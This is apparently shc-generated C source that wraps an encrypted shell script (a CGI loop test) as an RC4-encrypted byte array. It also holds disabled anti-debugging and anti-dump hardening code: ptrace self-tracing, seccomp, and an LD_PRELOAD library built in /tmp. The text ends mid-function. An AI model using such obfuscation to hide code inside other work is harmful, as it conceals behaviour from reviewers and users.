#if 0
	shc Version 4.0.3, Generic Shell Script Compiler
	GNU GPL Version 3 Md Jahidul Hamid <jahidulhamid@yahoo.com>

	shc -r -f /tmp/cgi-bin/butler/loop_test_without_count.sh 
#endif

static  char data [] = 
#define      chk2_z	19
#define      chk2	((&data[2]))
	"\337\227\333\247\372\076\204\032\135\345\346\334\340\176\345\170"
	"\315\376\262\073\243\220\023\222\013"
#define      tst2_z	19
#define      tst2	((&data[29]))
	"\234\151\244\021\046\311\303\272\041\243\172\225\065\143\246\003"
	"\147\110\200\270\241\037\372"
#define      pswd_z	256
#define      pswd	((&data[93]))
	"\137\221\123\353\046\110\161\162\107\031\120\227\023\314\147\362"
	"\143\370\006\366\004\344\351\052\201\122\316\222\123\200\337\262"
	"\022\063\236\070\174\020\253\304\052\374\133\075\310\164\051\351"
	"\162\252\142\025\157\150\273\240\371\336\165\300\214\043\232\123"
	"\372\047\174\305\152\016\377\100\227\123\161\343\310\233\315\072"
	"\105\060\120\265\230\014\125\222\352\313\123\166\356\355\311\351"
	"\025\106\256\177\124\255\277\354\001\061\320\311\314\235\004\022"
	"\315\124\307\146\140\034\371\112\350\114\301\326\072\213\277\117"
	"\321\156\317\046\033\217\023\035\300\343\346\215\201\352\237\117"
	"\076\146\266\237\203\257\351\153\374\253\102\066\066\002\205\007"
	"\160\125\056\214\344\101\251\244\044\220\062\246\172\321\365\271"
	"\070\253\130\273\133\102\047\127\355\151\215\044\154\023\053\334"
	"\150\131\151\114\233\023\361\277\243\043\146\036\364\133\327\054"
	"\007\060\350\143\163\020\272\141\171\110\205\346\133\261\303\304"
	"\013\054\020\246\100\002\146\344\045\314\002\032\050\332\107\060"
	"\013\057\223\176\077\116\337\271\226\144\240\362\026\143\266\041"
	"\220\307\307\320\311\055\265\357\371\267\011\041\222\120\122\235"
	"\200\345\033\300\064\373\172\313\140\032\275\166\176\164\227\016"
	"\074\136\337\006\214\224\365\205\114\376\247\336\117\303\060\054"
	"\274\066\042\300\033\013\353\234\135\271\057\260\072\016\143\115"
#define      shll_z	10
#define      shll	((&data[368]))
	"\205\263\277\065\273\205\354\122\005\064\276"
#define      msg1_z	65
#define      msg1	((&data[382]))
	"\075\055\336\353\035\312\222\230\345\063\052\261\316\153\012\057"
	"\375\071\323\032\306\071\204\037\364\364\207\014\212\122\005\335"
	"\251\165\344\203\242\337\114\100\212\101\361\232\031\045\375\335"
	"\002\040\232\126\146\001\356\311\262\266\261\000\314\152\340\154"
	"\154\360\152\335\172\366\242\252\042\137\341\104"
#define      date_z	1
#define      date	((&data[455]))
	"\254"
#define      inlo_z	3
#define      inlo	((&data[456]))
	"\304\074\366"
#define      opts_z	1
#define      opts	((&data[459]))
	"\114"
#define      xecc_z	15
#define      xecc	((&data[463]))
	"\114\031\304\246\132\102\157\035\026\353\312\062\113\254\070\324"
	"\360\312\322\330\327"
#define      lsto_z	1
#define      lsto	((&data[481]))
	"\031"
#define      tst1_z	22
#define      tst1	((&data[483]))
	"\047\260\142\140\042\307\331\360\022\067\202\171\036\236\335\062"
	"\355\122\073\040\066\222\026\334\072\112"
#define      chk1_z	22
#define      chk1	((&data[508]))
	"\070\005\152\212\004\255\107\000\113\360\077\166\306\041\211\025"
	"\176\334\203\020\214\110\133\027\336"
#define      msg2_z	19
#define      msg2	((&data[536]))
	"\054\170\351\255\063\270\020\172\034\156\206\206\314\217\310\260"
	"\034\300\054\377\174\247\053\117"
#define      rlax_z	1
#define      rlax	((&data[557]))
	"\073"
#define      text_z	3192
#define      text	((&data[791]))
	"\106\116\234\133\200\325\352\250\262\045\362\355\100\200\111\127"
	"\137\260\010\352\335\201\324\011\320\177\201\071\356\314\172\064"
	"\032\026\220\233\354\173\103\236\240\065\214\340\266\326\070\025"
	"\207\100\377\144\301\323\155\222\123\357\314\101\273\107\166\325"
	"\136\006\161\112\201\264\351\041\351\166\002\240\114\072\265\324"
	"\173\265\071\075\211\246\317\334\226\234\035\121\343\223\047\101"
	"\232\230\214\034\114\165\076\066\354\100\326\071\173\213\015\366"
	"\101\106\063\312\355\003\246\203\237\304\324\202\130\374\303\363"
	"\224\117\017\341\305\115\027\261\215\356\352\011\171\370\377\273"
	"\076\062\205\054\065\054\257\325\361\204\127\111\200\033\074\025"
	"\153\114\366\060\231\016\342\047\374\315\060\166\305\057\061\003"
	"\142\267\057\230\343\337\155\324\144\305\036\345\340\133\372\113"
	"\247\361\174\100\377\136\150\373\053\231\162\360\311\243\364\053"
	"\132\044\304\076\004\062\023\150\367\061\116\330\214\110\043\063"
	"\072\240\164\071\376\334\065\052\166\316\151\363\057\022\015\017"
	"\172\061\372\264\134\275\311\347\171\371\100\343\005\077\303\062"
	"\273\372\054\024\051\336\147\376\253\256\276\053\102\215\132\234"
	"\051\355\172\303\314\376\202\301\307\241\261\375\261\142\047\102"
	"\327\206\214\075\037\173\276\043\071\222\075\233\316\117\134\371"
	"\205\320\215\025\344\003\003\271\231\235\323\075\036\045\170\132"
	"\120\012\152\036\056\101\121\176\053\355\033\116\024\310\266\253"
	"\063\160\301\325\377\037\263\265\007\132\004\036\047\152\046\142"
	"\070\356\134\100\321\166\000\351\334\310\125\160\154\320\264\364"
	"\110\142\003\240\127\346\340\317\147\016\357\273\000\232\224\114"
	"\363\041\314\305\316\311\103\052\137\273\062\255\122\104\340\326"
	"\127\136\017\137\061\171\351\056\373\375\054\065\077\107\021\041"
	"\035\331\352\254\117\121\340\056\352\350\054\053\327\270\316\250"
	"\266\276\314\362\241\250\165\306\210\233\040\200\105\247\176\242"
	"\156\073\312\035\156\157\051\306\247\004\353\060\261\232\077\163"
	"\213\307\130\302\157\127\003\347\230\151\060\164\015\276\347\320"
	"\227\303\337\075\210\365\174\043\361\167\263\332\170\152\335\251"
	"\225\037\215\204\061\350\160\356\114\126\122\251\054\153\246\243"
	"\370\206\063\176\262\054\046\270\241\322\215\315\255\006\254\371"
	"\041\044\163\343\016\251\107\331\126\371\236\141\266\200\266\067"
	"\147\261\260\245\273\215\226\214\004\335\053\354\077\234\300\247"
	"\022\035\223\347\265\044\243\043\360\343\025\271\130\352\133\013"
	"\267\174\055\243\077\050\125\237\267\373\311\061\372\227\233\365"
	"\332\303\276\006\366\341\217\273\073\365\334\005\274\274\251\006"
	"\037\062\104\140\172\372\374\163\124\210\122\376\236\006\272\220"
	"\155\174\343\267\144\073\166\071\131\207\120\052\113\146\352\073"
	"\125\146\316\032\267\356\116\303\020\371\003\261\343\140\237\225"
	"\275\223\061\150\334\136\115\010\352\212\271\112\342\046\044\367"
	"\367\176\143\172\114\276\315\023\031\336\224\120\346\111\241\263"
	"\145\016\314\020\172\210\232\354\003\362\206\047\326\143\044\371"
	"\246\033\140\177\355\260\156\332\303\347\143\163\161\057\063\074"
	"\117\331\174\234\222\370\007\327\073\226\372\123\377\066\230\162"
	"\337\143\014\354\336\021\110\164\044\056\207\155\203\205\062\200"
	"\020\163\157\371\121\144\342\042\216\020\173\364\324\264\151\365"
	"\071\324\332\120\133\353\327\337\341\236\264\163\272\270\332\112"
	"\231\316\066\056\052\076\046\273\160\143\030\306\071\322\240\305"
	"\201\315\200\151\347\344\165\021\300\275\307\250\173\316\350\050"
	"\377\064\053\241\275\127\373\007\175\216\053\016\111\207\046\145"
	"\146\057\217\305\274\124\124\376\152\101\216\040\241\106\241\215"
	"\177\262\375\006\273\137\276\203\005\133\370\016\215\027\127\144"
	"\365\245\200\234\124\170\026\213\234\320\074\137\221\122\162\276"
	"\331\165\127\166\072\217\216\037\273\217\273\001\071\344\130\252"
	"\227\301\134\241\062\006\363\214\366\071\052\073\200\064\015\207"
	"\236\122\153\110\317\226\236\066\034\104\141\343\321\130\022\072"
	"\306\073\223\053\073\237\000\272\057\053\265\044\332\211\067\266"
	"\171\203\307\203\044\174\310\064\042\013\372\352\123\023\033\175"
	"\123\317\015\271\244\305\060\124\336\103\051\002\371\374\067\154"
	"\226\267\210\302\375\271\120\273\273\077\061\174\240\276\206\017"
	"\221\226\046\021\037\265\013\111\306\075\125\074\325\035\260\007"
	"\151\221\263\301\075\127\122\062\275\136\053\011\034\254\240\106"
	"\003\063\167\036\026\215\235\335\222\330\033\014\225\115\106\373"
	"\247\075\061\337\167\326\300\014\134\037\042\121\030\304\053\353"
	"\040\135\004\022\377\166\332\011\037\034\031\126\004\116\346\235"
	"\026\053\304\334\175\125\132\257\335\235\323\050\050\122\344\256"
	"\203\040\005\363\133\366\247\254\173\126\142\142\204\012\120\305"
	"\272\103\243\274\207\306\310\173\256\312\244\365\017\021\065\035"
	"\363\352\203\150\115\005\044\017\026\267\076\150\271\370\145\373"
	"\035\167\161\110\262\122\315\324\103\060\073\306\132\222\236\113"
	"\131\300\226\160\262\221\310\116\044\134\376\122\302\103\115\352"
	"\221\321\101\305\003\243\235\136\176\111\211\043\300\102\350\007"
	"\100\077\162\307\231\172\277\325\372\233\162\031\307\043\103\206"
	"\305\211\231\103\261\262\344\006\176\315\010\076\137\024\131\004"
	"\325\330\132\323\377\016\223\344\113\044\160\303\130\323\216\104"
	"\364\203\121\117\276\207\075\315\126\326\350\335\355\110\214\165"
	"\165\175\115\254\012\322\026\363\062\361\355\052\145\356\204\262"
	"\210\051\120\174\107\023\377\101\317\173\174\250\012\075\103\215"
	"\334\234\117\307\117\307\304\022\276\202\232\011\111\074\313\247"
	"\235\300\264\304\073\232\261\316\316\060\000\252\010\243\126\012"
	"\033\166\324\004\004\245\305\376\212\132\374\160\312\023\237\330"
	"\255\114\052\177\022\031\346\014\071\162\163\237\113\203\064\051"
	"\252\076\204\303\006\366\121\146\236\273\371\126\170\377\154\265"
	"\223\273\147\004\171\243\331\164\076\357\240\036\112\023\171\044"
	"\337\037\314\225\064\115\007\203\301\263\273\224\151\037\225\151"
	"\353\050\211\266\305\065\260\323\037\365\347\105\355\121\152\377"
	"\027\227\063\322\133\330\264\057\173\215\015\110\214\373\264\317"
	"\232\022\143\310\035\101\113\043\061\250\010\270\222\221\007\221"
	"\204\073\114\135\022\342\152\331\143\047\307\141\021\036\052\332"
	"\276\037\365\021\260\373\301\217\223\270\340\370\343\172\243\371"
	"\114\173\276\207\371\134\107\367\144\160\030\344\207\161\306\072"
	"\325\140\070\230\171\257\017\176\230\216\341\077\106\203\314\134"
	"\222\133\315\350\252\074\177\045\347\325\242\224\352\337\201\366"
	"\141\370\222\263\320\052\344\330\151\275\363\262\134\135\267\160"
	"\344\063\267\011\211\354\230\106\260\116\266\015\263\323\260\070"
	"\240\211\042\025\072\314\177\325\165\007\235\172\001\214\216\314"
	"\162\376\216\063\376\160\336\177\201\000\274\220\263\373\014\211"
	"\363\334\257\301\231\354\122\005\003\347\010\025\055\305\274\041"
	"\024\061\023\070\126\344\336\067\357\071\167\167\130\113\106\076"
	"\310\145\214\057\277\024\341\152\070\364\360\263\054\020\020\036"
	"\051\340\116\135\354\201\272\067\160\025\274\303\333\060\274\174"
	"\255\115\325\070\135\332\220\004\321\050\225\266\134\313\063\070"
	"\371\224\037\052\115\014\071\366\065\240\147\055\107\331\152\065"
	"\165\103\044\105\174\073\163\366\321\160\040\342\174\065\343\235"
	"\146\167\117\003\123\176\333\317\026\047\363\125\335\061\065\175"
	"\050\310\356\235\341\163\034\250\022\031\165\154\000\031\020\301"
	"\141\004\263\372\171\115\171\207\332\007\136\047\131\335\115\377"
	"\153\371\144\123\165\041\157\253\134\167\253\056\302\004\315\246"
	"\251\150\024\015\064\174\103\143\072\054\125\073\206\017\340\145"
	"\220\305\246\216\367\136\077\072\035\247\000\354\306\147\150\135"
	"\113\031\021\002\107\176\024\011\017\233\352\101\377\055\341\021"
	"\213\141\157\067\077\041\345\155\233\307\151\033\312\133\176\321"
	"\036\321\155\262\312\011\302\360\334\000\207\152\306\176\117\042"
	"\264\376\345\072\322\277\342\070\241\106\215\202\233\057\171\350"
	"\105\116\170\307\023\373\244\022\355\230\327\021\257\157\043\312"
	"\331\064\202\370\357\372\347\220\266\033\175\236\314\071\060\361"
	"\357\232\343\241\332\220\044\251\227\067\121\064\335\112\061\250"
	"\156\112\250\270\214\133\125\213\126\064\350\253\251\341\237\334"
	"\226\104\237\305\245\112\352\313\050\256\337\217\012\005\353\354"
	"\235\077\222\174\032\072\111\342\223\052\133\203\360\036\335\334"
	"\027\351\362\044\022\363\365\117\334\041\066\355\045\351\267\212"
	"\153\005\270\053\253\010\135\162\347\314\073\064\241\354\276\124"
	"\056\330\373\124\225\124\056\346\361\210\350\231\223\143\050\263"
	"\175\076\132\271\271\044\150\217\130\012\064\261\236\351\366\356"
	"\142\073\201\030\377\136\361\162\007\223\242\044\336\213\331\343"
	"\362\150\273\054\206\146\171\333\152\157\062\212\367\326\342\076"
	"\127\106\141\363\271\055\214\151\143\360\106\002\331\267\131\173"
	"\126\044\272\146\071\364\156\373\277\254\347\041\376\043\276\071"
	"\170\257\172\275\131\346\134\321\316\005\156\200\043\030\150\155"
	"\110\331\237\231\203\132\073\152\270\257\230\065\333\116\266\240"
	"\226\324\070\035\022\124\043\234\247\005\277\026\205\237\001\026"
	"\347\355\043\101\255\123\166\150\310\057\050\217\103\074\344\252"
	"\043\332\367\137\310\365\303\345\225\012\230\161\146\170\132\134"
	"\154\061\126\022\070\163\175\227\342\323\234\077\240\004\270\220"
	"\335\067\147\057\344\001\215\304\262\145\150\336\163\301\075\043"
	"\201\230\024\315\251\036\063\053\046\160\255\171\307\227\152\261"
	"\021\046\317\075\011\171\343\234\061\370\275\220\000\135\234\147"
	"\231\162\075\176\106\143\336\147\336\026\102\254\106\207\230\346"
	"\300\256\270\036\336\215\133\021\113\276\205\217\121\046\140\372"
	"\072\072\302\160\023\321\054\360\303\363\300\331\033\164\231\240"
	"\031\240\115\051\353\251\335\253\034\252\257\101\355\303\022\041"
	"\033\226\226\265\112\032\167\306\272\331\120\076\331\357\206\157"
	"\257\066\174\266\326\122\357\254\113\233\205\132\070\167\344\127"
	"\355\140\205\005\005\361\151\255\274\162\247\350\141\322\201\251"
	"\260\207\207\147\354\237\265\045\213\166\145\314\047\352\326\323"
	"\146\374\153\370\105\341\371\063\136\076\064\341\004\201\330\146"
	"\145\107\052\063\020\114\111\027\037\075\056\061\344\132\164\026"
	"\343\133\322\351\172\127\235\261\311\311\315\137\000\074\354\207"
	"\131\153\317\140\257\224\354\053\161\274\056\203\213\221\017\372"
	"\032\313\076\160\340\260\213\260\247\016\106\145\113\277\015\254"
	"\054\154\265\311\171\353\077\247\306\064\360\173\200\050\222\303"
	"\162\245\172\025\120\055\223\045\106\100\026\126\225\267\306\210"
	"\265\016\227\001\227\336\212\025\371\172\060\300\233\251\302\157"
	"\024\314\213\131\072\212\116\314\203\011\066\352\275\124\024\375"
	"\165\320\152\137\175\026\071\234\350\174\234\225\373\112\034\120"
	"\307\324\106\312\305\132\261\337\214\303\101\135\362\045\171\316"
	"\010\277\057\353\304\046\274\074\102\061\033\311\031\200\022\172"
	"\172\122\153\161\131\117\335\061\363\004\317\053\025\337\273\250"
	"\071\274\174\040\302\036\332\341\220\035\232\361\066\015\245\314"
	"\030\105\262\111\237\043\051\170\304\123\316\272\214\276\047\050"
	"\230\162\056\013\127\275\003\002\003\060\244\251\322\270\335\217"
	"\127\020\077\334\223\242\024\252\163\121\355\325\151\161\007\205"
	"\370\111\370\057\212\141\214\070\374\365\374\061\210\202\041\327"
	"\300\256\245\320\211\060\117\314\256\304\234\263\362\040\056\343"
	"\043\172\156\205\073\145\253\145\033\351\227\146\045\120\221\305"
	"\267\044\246\372\133\070\217\212\145\022\062\352\306\131\253\235"
	"\020\227\315\265\017\323\074\347\145\221\371\301\047\105\352\236"
	"\174\074\006\135\231\063\232\301\051\203\314\024\012\332\125\331"
	"\332\027\302\010\111\233\137\117\317\203\120\304\137\334\345\076"
	"\315\314\157\347\370\232\111\206\022\234\125\344\323\152\244\053"
	"\251\000\166\012\151\137\223\261\371\326\052\277\201\326\211\042"
	"\044\155\177\242\312\350\047\345\024\251\056\266\372\312\104\006"
	"\261\237\134\011\136\011\256\254\155\103\322\110\344\065\243\035"
	"\072\272\062\146\010\227\251\244\113\233\123\202\047\213\002\025"
	"\175\301\201\245\204\274\122\274\121\003\157\260\002\117\072\076"
	"\072\116\037\003\235\251\322\271\125\152\316\004\070\210\360\212"
	"\255\161\373\137\236\167\020\224\251\254\061\372\374\301\324\160"
	"\302\322\275\120\220\342\340\324\200\364\143\162\342\023\322\066"
	"\374\302\104\016\332\171\164\231\243\025\306\270\171\171\122\107"
	"\201\253\136\362\266\336\076\227\336\333\057\366\255\262\301\374"
	"\216\044\374\226\242\231\037\310\111\342\111\070\250\220\350\165"
	"\306\172\251\103\367\321\345\143\135\036\375\203\067\053\221\345"
	"\344\363\064\070\170\276\314\142\263\003\324\304\273\352\210\213"
	"\134\035\312\332\262\052\232\142\371\357\175\146\235\301\234\265"
	"\044\064\012\103\052\073\112\130\334\051\340\051\121\316\134\302"
	"\375\053\162\341\054\321\017\151\363\323\264\137\174\060\150\277"
	"\171\134\331\334\061\203\047\021\122\327\346\177\203\260\145\317"
	"\307\122\114\354\225\215\231\374\224\210\325\172\030\266\377\041"
	"\336\206\331\325\052\004\004\331\020\124\211\334\017\106\252\171"
	"\144\212\231\104\215\066\275\003\365\222\055\036\116\017\147\007"
	"\005\240\275\204\311\220\322\044\172\036\215\257\075\165\302\165"
	"\117\316\360\152\020\131\063\135\257\340\034\332\344\021\154\174"
	"\014\305\313\343\215\262\165\131\032\366\135\346\355\326\002\170"
	"\157\317\246\072\216\043\371\130\211\132\005\017\261\334\017\121"
	"\316\133\327\137\172\364\013\222\363\323\173\043\002\260\174\133"
	"\151\027\353\253\363\365\200\113\333\335\277\325\332\266\006\074"
	"\333\104\331\310\275\325\051\302\107\306\131\320\010\266\125\214"
	"\320\017\102\115\210\251\344\213\064\240\024\113\314\312\140\214"
	"\117\070\075\221\025\166\207\334\046\315\131\260\022\134\235\051"
	"\070\335\054\122\235\172\163\357\020\335\273\064\206\023\010\137"
	"\354\352\263\275\152\075\321\275\136\174\065\231\353\101\247\024"
	"\105\027\162\315\023\150\165\046\244\007\105\124\021\211\330\100"
	"\045\376\322\300\141\003\116\301\376\217\046\022\016\022\364\111"
	"\325\107\267\055\216\123\042\247\313\277\047\133\240\010\016\264"
	"\050\241\223\050\304\364\340\004\113\330\310\226\241\307\144\371"
	"\021\115\154\222\216\354\116\041\273\024\246\227\374\172\156\046"
	"\036\255\212\220\140\332\164\244\244\313\217\335\342\146\213\221"
	"\222\126\126\323\327\161\104\011\220\006\172\216\160\323\276\324"
	"\375\007\072\335\355\156\154\204\356\270\020\364\007\170\011\155"
	"\207\072\252\127\340\050\075\051\166\254\266\104\237\311\142\373"
	"\110\073\275\140\226\222\130\256\021\025\367\214\013\303\276\040"
	"\177\076\322\105\257\065\253\112\176\056\143\120\064\065\353\210"
	"\065\247\033\077\113\020\153\246\065\057\344\071\141\367\242\131"
	"\051\360\061\265\071\124\351\163\365\135\255\363\072\342\036\260"
	"\212\072\360\326\112\133\174\177\212\141\271\354\130\133\105\201"
	"\114\166\067\205\313\040\370\300\175\246\264\270\210\323\151\023"
	"\015\131\351\130\264\146\330\077\307\221\053\040\355\161\242\071"
	"\350\331\277\263\371\270\164\167\136\050\060\347\374\231\372\011"
	"\362\344\142\247\113\072\346\022\314\022\063\271\204\325\363\154"
	"\256\263\040\250\153\224\040\312\275\120\261\271\351\254\303\334"
	"\221\045\203\334\140\152\357\054\174\042\345\000\367\331\155\245"
	"\214\215\116\370\042\156\302\337\276\163\231\250\037\135\204\261"
	"\203\007\215\343\162\174\017\356\236\365\357\225\316\135\073\133"
	"\352\211\123\014\367\026\354\266\211\206\136\251\344\342\132\147"
	"\352\350\112\134\144\132\113\002\117\072\230\036"/* End of data[] */;
#define      hide_z	4096
#define SETUID 0	/* Define as 1 to call setuid(0) at start of script */
#define DEBUGEXEC	0	/* Define as 1 to debug execvp calls */
#define TRACEABLE	1	/* Define as 1 to enable ptrace the executable */
#define HARDENING	0	/* Define as 1 to disable ptrace/dump the executable */
#define BUSYBOXON	0	/* Define as 1 to enable work with busybox */

#if HARDENING
static const char * shc_x[] = {
"/*",
" * Copyright 2019 - Intika <intika@librefox.org>",
" * Replace ******** with secret read from fd 21",
" * Also change arguments location of sub commands (sh script commands)",
" * gcc -Wall -fpic -shared -o shc_secret.so shc_secret.c -ldl",
" */",
"",
"#define _GNU_SOURCE /* needed to get RTLD_NEXT defined in dlfcn.h */",
"#define PLACEHOLDER \"********\"",
"#include <dlfcn.h>",
"#include <stdlib.h>",
"#include <string.h>",
"#include <unistd.h>",
"#include <stdio.h>",
"#include <signal.h>",
"",
"static char secret[128000]; //max size",
"typedef int (*pfi)(int, char **, char **);",
"static pfi real_main;",
"",
"// copy argv to new location",
"char **copyargs(int argc, char** argv){",
"    char **newargv = malloc((argc+1)*sizeof(*argv));",
"    char *from,*to;",
"    int i,len;",
"",
"    for(i = 0; i<argc; i++){",
"        from = argv[i];",
"        len = strlen(from)+1;",
"        to = malloc(len);",
"        memcpy(to,from,len);",
"        // zap old argv space",
"        memset(from,'\\0',len);",
"        newargv[i] = to;",
"        argv[i] = 0;",
"    }",
"    newargv[argc] = 0;",
"    return newargv;",
"}",
"",
"static int mymain(int argc, char** argv, char** env) {",
"    //fprintf(stderr, \"Inject main argc = %d\\n\", argc);",
"    return real_main(argc, copyargs(argc,argv), env);",
"}",
"",
"int __libc_start_main(int (*main) (int, char**, char**),",
"                      int argc,",
"                      char **argv,",
"                      void (*init) (void),",
"                      void (*fini)(void),",
"                      void (*rtld_fini)(void),",
"                      void (*stack_end)){",
"    static int (*real___libc_start_main)() = NULL;",
"    int n;",
"",
"    if (!real___libc_start_main) {",
"        real___libc_start_main = dlsym(RTLD_NEXT, \"__libc_start_main\");",
"        if (!real___libc_start_main) abort();",
"    }",
"",
"    n = read(21, secret, sizeof(secret));",
"    if (n > 0) {",
"      int i;",
"",
"    if (secret[n - 1] == '\\n') secret[--n] = '\\0';",
"    for (i = 1; i < argc; i++)",
"        if (strcmp(argv[i], PLACEHOLDER) == 0)",
"          argv[i] = secret;",
"    }",
"",
"    real_main = main;",
"",
"    return real___libc_start_main(mymain, argc, argv, init, fini, rtld_fini, stack_end);",
"}",
"",
0};
#endif /* HARDENING */

/* rtc.c */

#include <sys/stat.h>
#include <sys/types.h>

#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <unistd.h>

/* 'Alleged RC4' */

static unsigned char stte[256], indx, jndx, kndx;

/*
 * Reset arc4 stte. 
 */
void stte_0(void)
{
	indx = jndx = kndx = 0;
	do {
		stte[indx] = indx;
	} while (++indx);
}

/*
 * Set key. Can be used more than once. 
 */
void key(void * str, int len)
{
	unsigned char tmp, * ptr = (unsigned char *)str;
	while (len > 0) {
		do {
			tmp = stte[indx];
			kndx += tmp;
			kndx += ptr[(int)indx % len];
			stte[indx] = stte[kndx];
			stte[kndx] = tmp;
		} while (++indx);
		ptr += 256;
		len -= 256;
	}
}

/*
 * Crypt data. 
 */
void arc4(void * str, int len)
{
	unsigned char tmp, * ptr = (unsigned char *)str;
	while (len > 0) {
		indx++;
		tmp = stte[indx];
		jndx += tmp;
		stte[indx] = stte[jndx];
		stte[jndx] = tmp;
		tmp += stte[indx];
		*ptr ^= stte[tmp];
		ptr++;
		len--;
	}
}

/* End of ARC4 */

#if HARDENING

#include <sys/ptrace.h>
#include <sys/wait.h>
#include <signal.h>
#include <sys/prctl.h>
#define PR_SET_PTRACER 0x59616d61

/* Seccomp Sandboxing Init */
#include <stdlib.h>
#include <stdio.h>
#include <stddef.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>

#include <sys/types.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <sys/socket.h>

#include <linux/filter.h>
#include <linux/seccomp.h>
#include <linux/audit.h>

#define ArchField offsetof(struct seccomp_data, arch)

#define Allow(syscall) \
    BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, SYS_##syscall, 0, 1), \
    BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_ALLOW)

struct sock_filter filter[] = {
    /* validate arch */
    BPF_STMT(BPF_LD+BPF_W+BPF_ABS, ArchField),
    BPF_JUMP( BPF_JMP+BPF_JEQ+BPF_K, AUDIT_ARCH_X86_64, 1, 0),
    BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_KILL),

    /* load syscall */
    BPF_STMT(BPF_LD+BPF_W+BPF_ABS, offsetof(struct seccomp_data, nr)),

    /* list of allowed syscalls */
    Allow(exit_group),  /* exits a process */
    Allow(brk),         /* for malloc(), inside libc */
    Allow(mmap),        /* also for malloc() */
    Allow(munmap),      /* for free(), inside libc */

    /* and if we don't match above, die */
    BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_KILL),
};
struct sock_fprog filterprog = {
    .len = sizeof(filter)/sizeof(filter[0]),
    .filter = filter
};

/* Seccomp Sandboxing - Set up the restricted environment */
void seccomp_hardening() {
    if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0)) {
        perror("Could not start seccomp:");
        exit(1);
    }
    if (prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &filterprog) == -1) {
        perror("Could not start seccomp:");
        exit(1);
    }
} 
/* End Seccomp Sandboxing Init */

void shc_x_file() {
    FILE *fp;
    int line = 0;

    if ((fp = fopen("/tmp/shc_x.c", "w")) == NULL ) {exit(1); exit(1);}
    for (line = 0; shc_x[line]; line++)	fprintf(fp, "%s\n", shc_x[line]);
    fflush(fp);fclose(fp);
}

int make() {
	char * cc, * cflags, * ldflags;
    char cmd[4096];

	cc = getenv("CC");
	if (!cc) cc = "cc";

	sprintf(cmd, "%s %s -o %s %s", cc, "-Wall -fpic -shared", "/tmp/shc_x.so", "/tmp/shc_x.c -ldl");
	if (system(cmd)) {remove("/tmp/shc_x.c"); return -1;}
	remove("/tmp/shc_x.c"); return 0;
}

void arc4_hardrun(void * str, int len) {
    //Decode locally
    char tmp2[len];
    char tmp3[len+1024];
    memcpy(tmp2, str, len);

	unsigned char tmp, * ptr = (unsigned char *)tmp2;
    int lentmp = len;
    int pid, status;
    pid = fork();

    shc_x_file();
    if (make()) {exit(1);}

    setenv("LD_PRELOAD","/tmp/shc_x.so",1);

    if(pid==0) {

        //Start tracing to protect from dump & trace
        if (ptrace(PTRACE_TRACEME, 0, 0, 0) < 0) {
            kill(getpid(), SIGKILL);
            _exit(1);
        }

        //Decode Bash
        while (len > 0) {
            indx++;
            tmp = stte[indx];
            jndx += tmp;
            stte[indx] = stte[jndx];
            stte[jndx] = tmp;
            tmp += stte[indx];
            *ptr ^= stte[tmp];
            ptr++;
            len--;
        }

        //Do the magic
        sprintf(tmp3, "%s %s", "'********' 21<<<", tmp2);

        //Exec bash script //fork execl with 'sh -c'
        system(tmp2);

        //Empty script variable
        memcpy(tmp2, str, lentmp);

        //Clean temp
        remove("/tmp/shc_x.so");

        //Sinal to detach ptrace
        ptrace(PTRACE_DETACH, 0, 0, 0);
        exit(0);
    }
    else {wait(&status);}

    /* Seccomp Sandboxing - Start */
    seccomp_hardening();

    exit(0);
}
#endif /* HARDENING */

/*
 * Key with file invariants. 
 */
int key_with_file(char * file)
{
	struct stat statf[1];
	struct stat control[1];

	if (stat(file, statf) < 0)
		return -1;

	/* Turn on stable fields */
	memset(control, 0, sizeof(control));
	control->st_ino = statf->st_ino;
	control->st_dev = statf->st_dev;
	control->st_rdev = statf->st_rdev;
	control->st_uid = statf->st_uid;
	control->st_gid = statf->st_gid;
	control->st_size = statf->st_size;
	control->st_mtime = statf->st_mtime;
	control->st_ctime = statf->st_ctime;
	key(control, sizeof(control));
	return 0;
}

#if DEBUGEXEC
void debugexec(char * sh11, int argc, char ** argv)
{
	int i;
	fprintf(stderr, "shll=%s\n", sh11 ? sh11 : "<null>");
	fprintf(stderr, "argc=%d\n", argc);
	if (!argv) {
		fprintf(stderr, "argv=<null>\n");
	} else { 
		for (i = 0; i <= argc ; i++)
			fprintf(stderr, "argv[%d]=%.60s\n", i, argv[i] ? argv[i] : "<null>");
	}
}
#endif /* DEBUGEXEC */

void rmarg(char ** argv, char * arg)
{
	for (; argv && *argv && *argv != arg; argv++);
	for (; argv && *argv; argv++)
		*argv = argv[1];
}

void chkenv_end(void);

int chkenv(int argc)
{
	char buff[512];
	unsigned long mask, m;
	int l, a, c;
	char * string;
	extern char ** environ;

	mask = (unsigned long)getpid();
	stte_0();
	 key(&chkenv, (void*)&chkenv_end - (void*)&chkenv);
	 key(&data, sizeof(data));
	 key(&mask, sizeof(mask));
	arc4(&mask, sizeof(mask));
	sprintf(buff, "x%lx", mask);
	string = getenv(buff);
#if DEBUGEXEC
	fprintf(stderr, "getenv(%s)=%s\n", buff, string ? string : "<null>");
#endif
	l = strlen(buff);
	if (!string) {
		/* 1st */
		sprintf(&buff[l], "=%lu %d", mask, argc);
		putenv(strdup(buff));
		return 0;
	}
	c = sscanf(string, "%lu %d%c", &m, &a, buff);
	if (c == 2 && m == mask) {
		/* 3rd */
		rmarg(environ, &string[-l - 1]);
		return 1 + (argc - a);
	}
	return -1;
}

void chkenv_end(void){}

#if HARDENING

static void gets_process_name(const pid_t pid, char * name) {
	char procfile[BUFSIZ];
	sprintf(procfile, "/proc/%d/cmdline", pid);
	FILE* f = fopen(procfile, "r");
	if (f) {
		size_t size;
		size = fread(name, sizeof (char), sizeof (procfile), f);
		if (size > 0) {
			if ('\n' == name[size - 1])
				name[size - 1] = '\0';
		}
		fclose(f);
	}
}

void hardening() {
    prctl(PR_SET_DUMPABLE, 0);
    prctl(PR_SET_PTRACER, -1);

    int pid = getppid();
    char name[256] = {0};
    gets_process_name(pid, name);

    if (   (strcmp(name, "bash") != 0) 
